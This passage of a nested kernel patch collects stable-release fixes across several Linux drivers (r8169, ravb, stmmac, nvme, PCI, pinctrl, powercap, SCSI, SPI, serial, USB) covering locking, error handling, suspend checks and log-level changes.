++	} else if (test_and_clear_bit(RTL_FLAG_TASK_RESET_NO_QUEUE_WAKE, tp->wk.flags)) {
++		rtl_reset_work(tp);
+ 	}
+ out_unlock:
+ 	rtnl_unlock();
+@@ -4580,7 +4595,7 @@ static void r8169_phylink_handler(struct net_device *ndev)
+ 	} else {
+ 		/* In few cases rx is broken after link-down otherwise */
+ 		if (rtl_is_8125(tp))
+-			rtl_reset_work(tp);
++			rtl_schedule_task(tp, RTL_FLAG_TASK_RESET_NO_QUEUE_WAKE);
+ 		pm_runtime_idle(d);
+ 	}
+ 
+@@ -4656,7 +4671,7 @@ static int rtl8169_close(struct net_device *dev)
+ 	rtl8169_down(tp);
+ 	rtl8169_rx_clear(tp);
+ 
+-	cancel_work_sync(&tp->wk.work);
++	cancel_work(&tp->wk.work);
+ 
+ 	free_irq(tp->irq, tp);
+ 
+@@ -4890,6 +4905,8 @@ static void rtl_remove_one(struct pci_dev *pdev)
+ 	if (pci_dev_run_wake(pdev))
+ 		pm_runtime_get_noresume(&pdev->dev);
+ 
++	cancel_work_sync(&tp->wk.work);
++
+ 	unregister_netdev(tp->dev);
+ 
+ 	if (tp->dash_type != RTL_DASH_NONE)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 9a52283d77544..68cb5616ef991 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -517,6 +517,15 @@ static void ravb_emac_init_gbeth(struct net_device *ndev)
+ {
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 
++	if (priv->phy_interface == PHY_INTERFACE_MODE_MII) {
++		ravb_write(ndev, (1000 << 16) | CXR35_SEL_XMII_MII, CXR35);
++		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1, 0);
++	} else {
++		ravb_write(ndev, (1000 << 16) | CXR35_SEL_XMII_RGMII, CXR35);
++		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1,
++			    CXR31_SEL_LINK0);
++	}
++
+ 	/* Receive frame limit set register */
+ 	ravb_write(ndev, GBETH_RX_BUFF_MAX + ETH_FCS_LEN, RFLR);
+ 
+@@ -539,14 +548,6 @@ static void ravb_emac_init_gbeth(struct net_device *ndev)
+ 
+ 	/* E-MAC interrupt enable register */
+ 	ravb_write(ndev, ECSIPR_ICDIP, ECSIPR);
+-
+-	if (priv->phy_interface == PHY_INTERFACE_MODE_MII) {
+-		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1, 0);
+-		ravb_write(ndev, (1000 << 16) | CXR35_SEL_XMII_MII, CXR35);
+-	} else {
+-		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1,
+-			    CXR31_SEL_LINK0);
+-	}
+ }
+ 
+ static void ravb_emac_init_rcar(struct net_device *ndev)
+@@ -1827,19 +1828,20 @@ static int ravb_open(struct net_device *ndev)
+ 	if (info->gptp)
+ 		ravb_ptp_init(ndev, priv->pdev);
+ 
+-	netif_tx_start_all_queues(ndev);
+-
+ 	/* PHY control start */
+ 	error = ravb_phy_start(ndev);
+ 	if (error)
+ 		goto out_ptp_stop;
+ 
++	netif_tx_start_all_queues(ndev);
++
+ 	return 0;
+ 
+ out_ptp_stop:
+ 	/* Stop PTP Clock driver */
+ 	if (info->gptp)
+ 		ravb_ptp_stop(ndev);
++	ravb_stop_dma(ndev);
+ out_free_irq_mgmta:
+ 	if (!info->multi_irqs)
+ 		goto out_free_irq;
+@@ -1890,6 +1892,12 @@ static void ravb_tx_timeout_work(struct work_struct *work)
+ 	struct net_device *ndev = priv->ndev;
+ 	int error;
+ 
++	if (!rtnl_trylock()) {
++		usleep_range(1000, 2000);
++		schedule_work(&priv->work);
++		return;
++	}
++
+ 	netif_tx_stop_all_queues(ndev);
+ 
+ 	/* Stop PTP Clock driver */
+@@ -1923,7 +1931,7 @@ static void ravb_tx_timeout_work(struct work_struct *work)
+ 		 */
+ 		netdev_err(ndev, "%s: ravb_dmac_init() failed, error %d\n",
+ 			   __func__, error);
+-		return;
++		goto out_unlock;
+ 	}
+ 	ravb_emac_init(ndev);
+ 
+@@ -1933,6 +1941,9 @@ out:
+ 		ravb_ptp_init(ndev, priv->pdev);
+ 
+ 	netif_tx_start_all_queues(ndev);
++
++out_unlock:
++	rtnl_unlock();
+ }
+ 
+ /* Packet transmit function for Ethernet AVB */
+@@ -2661,9 +2672,14 @@ static int ravb_probe(struct platform_device *pdev)
+ 	ndev->features = info->net_features;
+ 	ndev->hw_features = info->net_hw_features;
+ 
+-	reset_control_deassert(rstc);
++	error = reset_control_deassert(rstc);
++	if (error)
++		goto out_free_netdev;
++
+ 	pm_runtime_enable(&pdev->dev);
+-	pm_runtime_get_sync(&pdev->dev);
++	error = pm_runtime_resume_and_get(&pdev->dev);
++	if (error < 0)
++		goto out_rpm_disable;
+ 
+ 	if (info->multi_irqs) {
+ 		if (info->err_mgmt_irqs)
+@@ -2888,11 +2904,12 @@ out_disable_gptp_clk:
+ out_disable_refclk:
+ 	clk_disable_unprepare(priv->refclk);
+ out_release:
+-	free_netdev(ndev);
+-
+ 	pm_runtime_put(&pdev->dev);
++out_rpm_disable:
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(rstc);
++out_free_netdev:
++	free_netdev(ndev);
+ 	return error;
+ }
+ 
+@@ -2902,22 +2919,26 @@ static int ravb_remove(struct platform_device *pdev)
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 	const struct ravb_hw_info *info = priv->info;
+ 
+-	/* Stop PTP Clock driver */
+-	if (info->ccc_gac)
+-		ravb_ptp_stop(ndev);
+-
+-	clk_disable_unprepare(priv->gptp_clk);
+-	clk_disable_unprepare(priv->refclk);
+-
+-	/* Set reset mode */
+-	ravb_write(ndev, CCC_OPC_RESET, CCC);
+ 	unregister_netdev(ndev);
+ 	if (info->nc_queues)
+ 		netif_napi_del(&priv->napi[RAVB_NC]);
+ 	netif_napi_del(&priv->napi[RAVB_BE]);
++
+ 	ravb_mdio_release(priv);
++
++	/* Stop PTP Clock driver */
++	if (info->ccc_gac)
++		ravb_ptp_stop(ndev);
++
+ 	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
+ 			  priv->desc_bat_dma);
++
++	/* Set reset mode */
++	ravb_write(ndev, CCC_OPC_RESET, CCC);
++
++	clk_disable_unprepare(priv->gptp_clk);
++	clk_disable_unprepare(priv->refclk);
++
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(priv->rstc);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/mmc_core.c b/drivers/net/ethernet/stmicro/stmmac/mmc_core.c
+index ea4910ae0921a..6a7c1d325c464 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/mmc_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/mmc_core.c
+@@ -177,8 +177,10 @@
+ #define MMC_XGMAC_RX_DISCARD_OCT_GB	0x1b4
+ #define MMC_XGMAC_RX_ALIGN_ERR_PKT	0x1bc
+ 
++#define MMC_XGMAC_TX_FPE_INTR_MASK	0x204
+ #define MMC_XGMAC_TX_FPE_FRAG		0x208
+ #define MMC_XGMAC_TX_HOLD_REQ		0x20c
++#define MMC_XGMAC_RX_FPE_INTR_MASK	0x224
+ #define MMC_XGMAC_RX_PKT_ASSEMBLY_ERR	0x228
+ #define MMC_XGMAC_RX_PKT_SMD_ERR	0x22c
+ #define MMC_XGMAC_RX_PKT_ASSEMBLY_OK	0x230
+@@ -352,6 +354,8 @@ static void dwxgmac_mmc_intr_all_mask(void __iomem *mmcaddr)
+ {
+ 	writel(0x0, mmcaddr + MMC_RX_INTR_MASK);
+ 	writel(0x0, mmcaddr + MMC_TX_INTR_MASK);
++	writel(MMC_DEFAULT_MASK, mmcaddr + MMC_XGMAC_TX_FPE_INTR_MASK);
++	writel(MMC_DEFAULT_MASK, mmcaddr + MMC_XGMAC_RX_FPE_INTR_MASK);
+ 	writel(MMC_DEFAULT_MASK, mmcaddr + MMC_XGMAC_RX_IPC_INTR_MASK);
+ }
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 25ddfabc58f73..5b156c5bc04a5 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -2058,6 +2058,13 @@ static int nvme_update_ns_info_block(struct nvme_ns *ns,
+ 	if (ret)
+ 		return ret;
+ 
++	if (id->ncap == 0) {
++		/* namespace not allocated or attached */
++		info->is_removed = true;
++		ret = -ENODEV;
++		goto error;
++	}
++
+ 	blk_mq_freeze_queue(ns->disk->queue);
+ 	lbaf = nvme_lbaf_index(id->flbas);
+ 	ns->lba_shift = id->lbaf[lbaf].ds;
+@@ -2107,6 +2114,8 @@ out:
+ 		set_bit(NVME_NS_READY, &ns->flags);
+ 		ret = 0;
+ 	}
++
++error:
+ 	kfree(id);
+ 	return ret;
+ }
+diff --git a/drivers/pci/controller/dwc/pcie-qcom-ep.c b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+index d4c566c1c8725..1c7fd05ce0280 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom-ep.c
++++ b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+@@ -120,6 +120,7 @@
+ 
+ /* ELBI registers */
+ #define ELBI_SYS_STTS				0x08
++#define ELBI_CS2_ENABLE				0xa4
+ 
+ /* DBI registers */
+ #define DBI_CON_STATUS				0x44
+@@ -252,6 +253,21 @@ static void qcom_pcie_dw_stop_link(struct dw_pcie *pci)
+ 	disable_irq(pcie_ep->perst_irq);
+ }
+ 
++static void qcom_pcie_dw_write_dbi2(struct dw_pcie *pci, void __iomem *base,
++				    u32 reg, size_t size, u32 val)
++{
++	struct qcom_pcie_ep *pcie_ep = to_pcie_ep(pci);
++	int ret;
++
++	writel(1, pcie_ep->elbi + ELBI_CS2_ENABLE);
++
++	ret = dw_pcie_write(pci->dbi_base2 + reg, size, val);
++	if (ret)
++		dev_err(pci->dev, "Failed to write DBI2 register (0x%x): %d\n", reg, ret);
++
++	writel(0, pcie_ep->elbi + ELBI_CS2_ENABLE);
++}
++
+ static int qcom_pcie_enable_resources(struct qcom_pcie_ep *pcie_ep)
+ {
+ 	int ret;
+@@ -446,6 +462,7 @@ static const struct dw_pcie_ops pci_ops = {
+ 	.link_up = qcom_pcie_dw_link_up,
+ 	.start_link = qcom_pcie_dw_start_link,
+ 	.stop_link = qcom_pcie_dw_stop_link,
++	.write_dbi2 = qcom_pcie_dw_write_dbi2,
+ };
+ 
+ static int qcom_pcie_ep_get_io_resources(struct platform_device *pdev,
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 48389785d9247..c132839d99dc8 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -6058,3 +6058,15 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2d, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a31, dpc_log_size);
+ #endif
++
++/*
++ * Devices known to require a longer delay before first config space access
++ * after reset recovery or resume from D3cold:
++ *
++ * VideoPropulsion (aka Genroco) Torrent QN16e MPEG QAM Modulator
++ */
++static void pci_fixup_d3cold_delay_1sec(struct pci_dev *pdev)
++{
++	pdev->d3cold_delay = 1000;
++}
++DECLARE_PCI_FIXUP_FINAL(0x5555, 0x0004, pci_fixup_d3cold_delay_1sec);
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 9e57f4c62e609..f1962866bb814 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1239,17 +1239,17 @@ static void pinctrl_link_add(struct pinctrl_dev *pctldev,
+ static int pinctrl_commit_state(struct pinctrl *p, struct pinctrl_state *state)
+ {
+ 	struct pinctrl_setting *setting, *setting2;
+-	struct pinctrl_state *old_state = p->state;
++	struct pinctrl_state *old_state = READ_ONCE(p->state);
+ 	int ret;
+ 
+-	if (p->state) {
++	if (old_state) {
+ 		/*
+ 		 * For each pinmux setting in the old state, forget SW's record
+ 		 * of mux owner for that pingroup. Any pingroups which are
+ 		 * still owned by the new state will be re-acquired by the call
+ 		 * to pinmux_enable_setting() in the loop below.
+ 		 */
+-		list_for_each_entry(setting, &p->state->settings, node) {
++		list_for_each_entry(setting, &old_state->settings, node) {
+ 			if (setting->type != PIN_MAP_TYPE_MUX_GROUP)
+ 				continue;
+ 			pinmux_disable_setting(setting);
+diff --git a/drivers/powercap/dtpm_cpu.c b/drivers/powercap/dtpm_cpu.c
+index 2ff7717530bf8..8a2f18fa3faf5 100644
+--- a/drivers/powercap/dtpm_cpu.c
++++ b/drivers/powercap/dtpm_cpu.c
+@@ -24,7 +24,6 @@
+ #include <linux/of.h>
+ #include <linux/pm_qos.h>
+ #include <linux/slab.h>
+-#include <linux/units.h>
+ 
+ struct dtpm_cpu {
+ 	struct dtpm dtpm;
+@@ -104,8 +103,7 @@ static u64 get_pd_power_uw(struct dtpm *dtpm)
+ 		if (pd->table[i].frequency < freq)
+ 			continue;
+ 
+-		return scale_pd_power_uw(pd_mask, pd->table[i].power *
+-					 MICROWATT_PER_MILLIWATT);
++		return scale_pd_power_uw(pd_mask, pd->table[i].power);
+ 	}
+ 
+ 	return 0;
+@@ -122,11 +120,9 @@ static int update_pd_power_uw(struct dtpm *dtpm)
+ 	nr_cpus = cpumask_weight(&cpus);
+ 
+ 	dtpm->power_min = em->table[0].power;
+-	dtpm->power_min *= MICROWATT_PER_MILLIWATT;
+ 	dtpm->power_min *= nr_cpus;
+ 
+ 	dtpm->power_max = em->table[em->nr_perf_states - 1].power;
+-	dtpm->power_max *= MICROWATT_PER_MILLIWATT;
+ 	dtpm->power_max *= nr_cpus;
+ 
+ 	return 0;
+diff --git a/drivers/powercap/dtpm_devfreq.c b/drivers/powercap/dtpm_devfreq.c
+index 91276761a31d9..612c3b59dd5be 100644
+--- a/drivers/powercap/dtpm_devfreq.c
++++ b/drivers/powercap/dtpm_devfreq.c
+@@ -39,10 +39,8 @@ static int update_pd_power_uw(struct dtpm *dtpm)
+ 	struct em_perf_domain *pd = em_pd_get(dev);
+ 
+ 	dtpm->power_min = pd->table[0].power;
+-	dtpm->power_min *= MICROWATT_PER_MILLIWATT;
+ 
+ 	dtpm->power_max = pd->table[pd->nr_perf_states - 1].power;
+-	dtpm->power_max *= MICROWATT_PER_MILLIWATT;
+ 
+ 	return 0;
+ }
+@@ -54,13 +52,10 @@ static u64 set_pd_power_limit(struct dtpm *dtpm, u64 power_limit)
+ 	struct device *dev = devfreq->dev.parent;
+ 	struct em_perf_domain *pd = em_pd_get(dev);
+ 	unsigned long freq;
+-	u64 power;
+ 	int i;
+ 
+ 	for (i = 0; i < pd->nr_perf_states; i++) {
+-
+-		power = pd->table[i].power * MICROWATT_PER_MILLIWATT;
+-		if (power > power_limit)
++		if (pd->table[i].power > power_limit)
+ 			break;
+ 	}
+ 
+@@ -68,7 +63,7 @@ static u64 set_pd_power_limit(struct dtpm *dtpm, u64 power_limit)
+ 
+ 	dev_pm_qos_update_request(&dtpm_devfreq->qos_req, freq);
+ 
+-	power_limit = pd->table[i - 1].power * MICROWATT_PER_MILLIWATT;
++	power_limit = pd->table[i - 1].power;
+ 
+ 	return power_limit;
+ }
+@@ -110,7 +105,7 @@ static u64 get_pd_power_uw(struct dtpm *dtpm)
+ 		if (pd->table[i].frequency < freq)
+ 			continue;
+ 
+-		power = pd->table[i].power * MICROWATT_PER_MILLIWATT;
++		power = pd->table[i].power;
+ 		power *= status.busy_time;
+ 		power >>= 10;
+ 
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index deed8c909a786..31b5273f43a71 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3834,8 +3834,15 @@ static int sd_resume(struct device *dev, bool runtime)
+ 
+ static int sd_resume_system(struct device *dev)
+ {
+-	if (pm_runtime_suspended(dev))
++	if (pm_runtime_suspended(dev)) {
++		struct scsi_disk *sdkp = dev_get_drvdata(dev);
++		struct scsi_device *sdp = sdkp ? sdkp->device : NULL;
++
++		if (sdp && sdp->force_runtime_start_on_system_start)
++			pm_request_resume(dev);
++
+ 		return 0;
++	}
+ 
+ 	return sd_resume(dev, false);
+ }
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 151fef199c380..5d046be8b2dd5 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -3299,33 +3299,52 @@ void spi_unregister_controller(struct spi_controller *ctlr)
+ }
+ EXPORT_SYMBOL_GPL(spi_unregister_controller);
+ 
++static inline int __spi_check_suspended(const struct spi_controller *ctlr)
++{
++	return ctlr->flags & SPI_CONTROLLER_SUSPENDED ? -ESHUTDOWN : 0;
++}
++
++static inline void __spi_mark_suspended(struct spi_controller *ctlr)
++{
++	mutex_lock(&ctlr->bus_lock_mutex);
++	ctlr->flags |= SPI_CONTROLLER_SUSPENDED;
++	mutex_unlock(&ctlr->bus_lock_mutex);
++}
++
++static inline void __spi_mark_resumed(struct spi_controller *ctlr)
++{
++	mutex_lock(&ctlr->bus_lock_mutex);
++	ctlr->flags &= ~SPI_CONTROLLER_SUSPENDED;
++	mutex_unlock(&ctlr->bus_lock_mutex);
++}
++
+ int spi_controller_suspend(struct spi_controller *ctlr)
+ {
+-	int ret;
++	int ret = 0;
+ 
+ 	/* Basically no-ops for non-queued controllers */
+-	if (!ctlr->queued)
+-		return 0;
+-
+-	ret = spi_stop_queue(ctlr);
+-	if (ret)
+-		dev_err(&ctlr->dev, "queue stop failed\n");
++	if (ctlr->queued) {
++		ret = spi_stop_queue(ctlr);
++		if (ret)
++			dev_err(&ctlr->dev, "queue stop failed\n");
++	}
+ 
++	__spi_mark_suspended(ctlr);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(spi_controller_suspend);
+ 
+ int spi_controller_resume(struct spi_controller *ctlr)
+ {
+-	int ret;
+-
+-	if (!ctlr->queued)
+-		return 0;
++	int ret = 0;
+ 
+-	ret = spi_start_queue(ctlr);
+-	if (ret)
+-		dev_err(&ctlr->dev, "queue restart failed\n");
++	__spi_mark_resumed(ctlr);
+ 
++	if (ctlr->queued) {
++		ret = spi_start_queue(ctlr);
++		if (ret)
++			dev_err(&ctlr->dev, "queue restart failed\n");
++	}
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(spi_controller_resume);
+@@ -4050,8 +4069,7 @@ static void __spi_transfer_message_noqueue(struct spi_controller *ctlr, struct s
+ 	ctlr->cur_msg = msg;
+ 	ret = __spi_pump_transfer_message(ctlr, msg, was_busy);
+ 	if (ret)
+-		goto out;
+-
++		dev_err(&ctlr->dev, "noqueue transfer failed\n");
+ 	ctlr->cur_msg = NULL;
+ 	ctlr->fallback = false;
+ 
+@@ -4067,7 +4085,6 @@ static void __spi_transfer_message_noqueue(struct spi_controller *ctlr, struct s
+ 		spi_idle_runtime_pm(ctlr);
+ 	}
+ 
+-out:
+ 	mutex_unlock(&ctlr->io_mutex);
+ }
+ 
+@@ -4090,6 +4107,11 @@ static int __spi_sync(struct spi_device *spi, struct spi_message *message)
+ 	int status;
+ 	struct spi_controller *ctlr = spi->controller;
+ 
++	if (__spi_check_suspended(ctlr)) {
++		dev_warn_once(&spi->dev, "Attempted to sync while suspend\n");
++		return -ESHUTDOWN;
++	}
++
+ 	status = __spi_validate(spi, message);
+ 	if (status != 0)
+ 		return status;
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 21145eb8f2a9c..b398fba942964 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -486,6 +486,7 @@ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+ 	case SC16IS7XX_TXLVL_REG:
+ 	case SC16IS7XX_RXLVL_REG:
+ 	case SC16IS7XX_IOSTATE_REG:
++	case SC16IS7XX_IOCONTROL_REG:
+ 		return true;
+ 	default:
+ 		break;
+@@ -1555,6 +1556,10 @@ static int sc16is7xx_probe(struct device *dev,
+ 			goto out_ports;
+ 		}
+ 
++		ret = uart_get_rs485_mode(&s->p[i].port);
++		if (ret)
++			goto out_ports;
++
+ 		/* Disable all interrupts */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_IER_REG, 0);
+ 		/* Disable TX/RX */
+diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
+index 48bc8a4814ac4..d396ac8b9cedd 100644
+--- a/drivers/usb/core/config.c
++++ b/drivers/usb/core/config.c
+@@ -61,7 +61,7 @@ static void usb_parse_ssp_isoc_endpoint_companion(struct device *ddev,
+ 	desc = (struct usb_ssp_isoc_ep_comp_descriptor *) buffer;
+ 	if (desc->bDescriptorType != USB_DT_SSP_ISOC_ENDPOINT_COMP ||
+ 	    size < USB_DT_SSP_ISOC_EP_COMP_SIZE) {
+-		dev_warn(ddev, "Invalid SuperSpeedPlus isoc endpoint companion"
++		dev_notice(ddev, "Invalid SuperSpeedPlus isoc endpoint companion"
+ 			 "for config %d interface %d altsetting %d ep %d.\n",
+ 			 cfgno, inum, asnum, ep->desc.bEndpointAddress);
+ 		return;
+@@ -83,7 +83,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 
+ 	if (desc->bDescriptorType != USB_DT_SS_ENDPOINT_COMP ||
+ 			size < USB_DT_SS_EP_COMP_SIZE) {
+-		dev_warn(ddev, "No SuperSpeed endpoint companion for config %d "
++		dev_notice(ddev, "No SuperSpeed endpoint companion for config %d "
+ 				" interface %d altsetting %d ep %d: "
+ 				"using minimum values\n",
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+@@ -109,13 +109,13 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 
+ 	/* Check the various values */
+ 	if (usb_endpoint_xfer_control(&ep->desc) && desc->bMaxBurst != 0) {
+-		dev_warn(ddev, "Control endpoint with bMaxBurst = %d in "
++		dev_notice(ddev, "Control endpoint with bMaxBurst = %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to zero\n", desc->bMaxBurst,
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+ 		ep->ss_ep_comp.bMaxBurst = 0;
+ 	} else if (desc->bMaxBurst > 15) {
+-		dev_warn(ddev, "Endpoint with bMaxBurst = %d in "
++		dev_notice(ddev, "Endpoint with bMaxBurst = %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to 15\n", desc->bMaxBurst,
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+@@ -125,7 +125,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 	if ((usb_endpoint_xfer_control(&ep->desc) ||
+ 			usb_endpoint_xfer_int(&ep->desc)) &&
+ 				desc->bmAttributes != 0) {
+-		dev_warn(ddev, "%s endpoint with bmAttributes = %d in "
++		dev_notice(ddev, "%s endpoint with bmAttributes = %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to zero\n",
+ 				usb_endpoint_xfer_control(&ep->desc) ? "Control" : "Bulk",
+@@ -134,7 +134,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 		ep->ss_ep_comp.bmAttributes = 0;
+ 	} else if (usb_endpoint_xfer_bulk(&ep->desc) &&
+ 			desc->bmAttributes > 16) {
+-		dev_warn(ddev, "Bulk endpoint with more than 65536 streams in "
++		dev_notice(ddev, "Bulk endpoint with more than 65536 streams in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to max\n",
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+@@ -142,7 +142,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 	} else if (usb_endpoint_xfer_isoc(&ep->desc) &&
+ 		   !USB_SS_SSP_ISOC_COMP(desc->bmAttributes) &&
+ 		   USB_SS_MULT(desc->bmAttributes) > 3) {
+-		dev_warn(ddev, "Isoc endpoint has Mult of %d in "
++		dev_notice(ddev, "Isoc endpoint has Mult of %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to 3\n",
+ 				USB_SS_MULT(desc->bmAttributes),
+@@ -160,7 +160,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 	else
+ 		max_tx = 999999;
+ 	if (le16_to_cpu(desc->wBytesPerInterval) > max_tx) {
+-		dev_warn(ddev, "%s endpoint with wBytesPerInterval of %d in "
++		dev_notice(ddev, "%s endpoint with wBytesPerInterval of %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to %d\n",
+ 				usb_endpoint_xfer_isoc(&ep->desc) ? "Isoc" : "Int",
+@@ -273,7 +273,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	else if (d->bLength >= USB_DT_ENDPOINT_SIZE)
+ 		n = USB_DT_ENDPOINT_SIZE;
+ 	else {
+-		dev_warn(ddev, "config %d interface %d altsetting %d has an "
++		dev_notice(ddev, "config %d interface %d altsetting %d has an "
+ 		    "invalid endpoint descriptor of length %d, skipping\n",
+ 		    cfgno, inum, asnum, d->bLength);
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+@@ -281,7 +281,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 
+ 	i = d->bEndpointAddress & ~USB_ENDPOINT_DIR_MASK;
+ 	if (i >= 16 || i == 0) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d has an "
++		dev_notice(ddev, "config %d interface %d altsetting %d has an "
+ 		    "invalid endpoint with address 0x%X, skipping\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress);
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+@@ -293,7 +293,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 
+ 	/* Check for duplicate endpoint addresses */
+ 	if (config_endpoint_is_duplicate(config, inum, asnum, d)) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n",
++		dev_notice(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n",
+ 				cfgno, inum, asnum, d->bEndpointAddress);
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+ 	}
+@@ -301,7 +301,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	/* Ignore some endpoints */
+ 	if (udev->quirks & USB_QUIRK_ENDPOINT_IGNORE) {
+ 		if (usb_endpoint_is_ignored(udev, ifp, d)) {
+-			dev_warn(ddev, "config %d interface %d altsetting %d has an ignored endpoint with address 0x%X, skipping\n",
++			dev_notice(ddev, "config %d interface %d altsetting %d has an ignored endpoint with address 0x%X, skipping\n",
+ 					cfgno, inum, asnum,
+ 					d->bEndpointAddress);
+ 			goto skip_to_next_endpoint_or_interface_descriptor;
+@@ -378,7 +378,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 		}
+ 	}
+ 	if (d->bInterval < i || d->bInterval > j) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d "
++		dev_notice(ddev, "config %d interface %d altsetting %d "
+ 		    "endpoint 0x%X has an invalid bInterval %d, "
+ 		    "changing to %d\n",
+ 		    cfgno, inum, asnum,
+@@ -391,7 +391,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	 * them usable, we will try treating them as Interrupt endpoints.
+ 	 */
+ 	if (udev->speed == USB_SPEED_LOW && usb_endpoint_xfer_bulk(d)) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d "
++		dev_notice(ddev, "config %d interface %d altsetting %d "
+ 		    "endpoint 0x%X is Bulk; changing to Interrupt\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress);
+ 		endpoint->desc.bmAttributes = USB_ENDPOINT_XFER_INT;
+@@ -408,7 +408,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	 */
+ 	maxp = le16_to_cpu(endpoint->desc.wMaxPacketSize);
+ 	if (maxp == 0 && !(usb_endpoint_xfer_isoc(d) && asnum == 0)) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid wMaxPacketSize 0\n",
++		dev_notice(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid wMaxPacketSize 0\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress);
+ 	}
+ 
+@@ -439,7 +439,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	j = maxpacket_maxes[usb_endpoint_type(&endpoint->desc)];
+ 
+ 	if (maxp > j) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid maxpacket %d, setting to %d\n",
++		dev_notice(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid maxpacket %d, setting to %d\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress, maxp, j);
+ 		maxp = j;
+ 		endpoint->desc.wMaxPacketSize = cpu_to_le16(i | maxp);
+@@ -452,7 +452,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	 */
+ 	if (udev->speed == USB_SPEED_HIGH && usb_endpoint_xfer_bulk(d)) {
+ 		if (maxp != 512)
+-			dev_warn(ddev, "config %d interface %d altsetting %d "
++			dev_notice(ddev, "config %d interface %d altsetting %d "
